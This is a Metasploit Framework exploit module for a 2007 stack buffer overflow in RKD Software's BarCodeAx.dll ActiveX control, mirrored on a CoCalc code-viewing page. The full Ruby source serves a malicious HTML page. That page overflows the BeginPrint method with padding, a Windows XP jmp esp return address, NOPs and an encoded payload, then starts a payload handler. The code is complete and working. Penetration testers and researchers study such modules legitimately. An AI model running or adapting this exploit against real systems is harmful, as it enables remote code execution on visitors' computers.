CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/barcode_ax49.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a stack buffer overflow in RKD Software Barcode Application

16
        ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint

17
        method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.

18
      },

19
      'License'        => MSF_LICENSE,

20
      'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'aushack' ],

21
      'References'     =>

22
        [

23
          [ 'EDB', '4094' ],

24
          [ 'OSVDB', '37482' ],

25
          [ 'BID', '24596' ],

26
          [ 'CVE', '2007-3435' ],

27
        ],

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'process',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'         => 1024,

35
          'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",

36
          'StackAdjustment' => -3500,

37
        },

38
      'Platform'       => 'win',

39
      'Targets'        =>

40
        [

41
          [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0

42
        ],

43
      'DisclosureDate' => '2007-06-22',

44
      'DefaultTarget'  => 0))

45
  end

46


47
  def autofilter

48
    false

49
  end

50


51
  def check_dependencies

52
    use_zlib

53
  end

54


55
  def on_request_uri(cli, request)

56
    # Re-generate the payload

57
    return if ((p = regenerate_payload(cli)) == nil)

58


59
    # Randomize some things

60
    vname = rand_text_alpha(rand(100) + 1)

61


62
    buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded

63


64
    # Build out the message

65
    content = %Q|<html>

66
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>

67
<script language='javascript'>

68
#{vname}.BeginPrint("#{buff}");

69
</script>

70
</html>

71
|

72


73
    print_status("Sending #{self.name}")

74


75
    # Transmit the response to the client

76
    send_response_html(cli, content)

77


78
    # Handle the payload

79
    handler(cli)

80
  end

81
end

82


83